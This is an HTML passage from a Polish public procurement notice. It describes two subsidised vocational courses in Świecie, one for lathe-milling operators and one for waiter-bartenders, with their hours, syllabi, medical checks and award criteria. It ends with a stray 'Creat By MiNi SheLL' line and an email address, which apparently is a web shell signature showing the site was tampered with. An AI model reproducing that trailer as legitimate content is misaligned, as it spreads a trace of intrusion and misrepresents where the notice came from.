<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs musi obejmować teoretyczne i praktyczne zajęcia przygotowujące słuchacza  do wykonywania zawodu tokarz-frezer.
Szkolenie musi obejmować co najmniej 150 godzin lekcyjnych na jednego uczestnika w grupie szkoleniowej, w tym zajęcia teoretyczne (20 godz.) i praktyczne (130 godz.). Godzina lekcyjna szkolenia liczy 45 minut zajęć.

W programie szkolenia muszą znaleźć się zagadnienia dotyczące:
-Technicznych podstaw zawodu tokarza i frezera
-Odwzorowania i zapisu konstrukcji z elementami maszynoznawstwa
-Przepisów bezpieczeństwa i higieny pracy.
Celem szkolenia musi być zdobycie przez jego uczestników umiejętności:
-Obsługi urządzeń tokarskich i frezerskich,
-Obsługi maszyn i urządzeń o dużych gabarytach,
-Obsługi tokarek manualnych do średnicy 1250 mm, długości 10000 mm i masie do 20 ton,
-Frezowania płaszczyzn o gabarytach do 1320x500x500 mm, kół zębatych walcowych o zębach prostych i śrubowych do modułu 12 mm i średnicy do 800 mm,
-Wytaczania i wiercenia na wiertarko-frezarkach detali o gabarytach 1120x1250x1500 i masie do 2 ton.

Zajęcia teoretyczne odbędą się w siedzibie Ośrodka Szkolenia Zawodowego w Świeciu przy ul. Chmielniki 2B.
Zajęcia praktyczne muszą odbyć się na terenie Świecia. W innym przypadku, wykonawca zobowiązany jest do zorganizowania i opłacenia transportu dla uczestników kursu.
Kurs musi kończyć się egzaminem i uzyskaniem zaświadczenia o ukończeniu kursu zgodnie z § 6 rozporządzenia Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216).

W ramach realizacji szkolenia tokarz-frezer Wykonawca będzie zobowiązany w szczególności do:
-zapewnienia uczestnikom kursu wymaganej odzieży ochronnej podczas wykonywania zajęć praktycznych, zgodnie z przepisami BHP,
-skierowania uczestników kursu na badania lekarskie co najmniej 3 dni robocze przed rozpoczęciem kursu oraz do ich sfinansowania i przekazania Zamawiającemu informacji o wynikach badań niezwłocznie po ich otrzymaniu. W przypadku wykluczenia któregokolwiek z uczestników przez uprawnionego lekarza, Wykonawca sfinansuje badania osób następnych, wg kolejności wskazanej na liście rezerwowej, aż do wyłonienia 10 uczestników kursu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie w realizacji kursów zawodowych dla młodzieży zagrożonej wykluczeniem społecznym - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie kursu kelner-barman dla 10 osób w Świeciu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs kelner-barman dla 10 osób w Świeciu
Zakres tematyczny kursu i liczba godzin szkolenia:
-Zagadnienia z zakresu pracy na stanowisku kelner - barman: wiadomości o zakładach gastronomicznych, systemy rozliczeń kelnerskich oraz sposoby załatwiania skarg i wniosków, czynności porządkowe, poziom i kultura obsługi konsumenta w zakładzie gastronomicznym, bufet, technika noszenia naczyń i tac, zasady serwowania dań, technika podawania potraw, technologia i technika pracy w barze, podstawy miksologii - 42 godz.
-Obsługa kas fiskalnych - 8 godz. 
-Praktyki zawodowe z lokalnej restauracji, kawiarni lub klubie - 15 godz. 
Łącznie 65 godz. na jednego uczestnika w grupie szkoleniowej. 
Godzina lekcyjna szkolenia liczy 45 minut zajęć.

Celem szkolenia jest nabycie wiedzy i umiejętności niezbędnych do podjęcia zatrudnienia na stanowisku kelner-barman.
Każdy uczestnik po ukończeniu kursu musi otrzymać zaświadczenie o ukończeniu kursu zgodnie z § 6 rozporządzenia Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216).

Zajęcia teoretyczne odbędą się w siedzibie Ośrodka Szkolenia Zawodowego w Świeciu przy ul. Chmielniki 2B. 
Praktyki 15-godzinne powinny odbyć się na terenie Świecia. W innym przypadku, wykonawca zobowiązany jest do zorganizowania i opłacenia transportu dla uczestników kursu.

W ramach realizacji szkolenia kelner-barman Wykonawca będzie zobowiązany w szczególności do:
-skierowania uczestników kursu na badania lekarskie co najmniej 3 dni robocze przed rozpoczęciem kursu oraz do ich sfinansowania i zobowiązany jest do przekazania Zamawiającemu informacji o wynikach badań niezwłocznie po ich otrzymaniu. W przypadku wykluczenia któregokolwiek z uczestników przez uprawnionego lekarza, Wykonawca sfinansuje badania osób następnych, wg kolejności wskazanej na liście rezerwowej, aż do wyłonienia 10 uczestników kursu,
-skierowania uczestników oraz sfinansowania kosztów badania mikrobiologicznego na nosicielstwo bakterii z rodzaju Salmonella i Shigella. Czas przeznaczony na wykonanie badań na nosicielstwo nie jest wliczany do godzin kursu,
-zapewnienia uczestnikom szkolenia wymaganej odzieży ochronnej podczas wykonywania zajęć praktycznych, zgodnie z przepisami BHP,  
-zapewnienia kas fiskalnych, akcesoriów barmańskich oraz produktów niezbędnych do nauki miksologii  na czas trwania szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie w realizacji kursów zawodowych dla młodzieży zagrożonej wykluczeniem społecznym - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com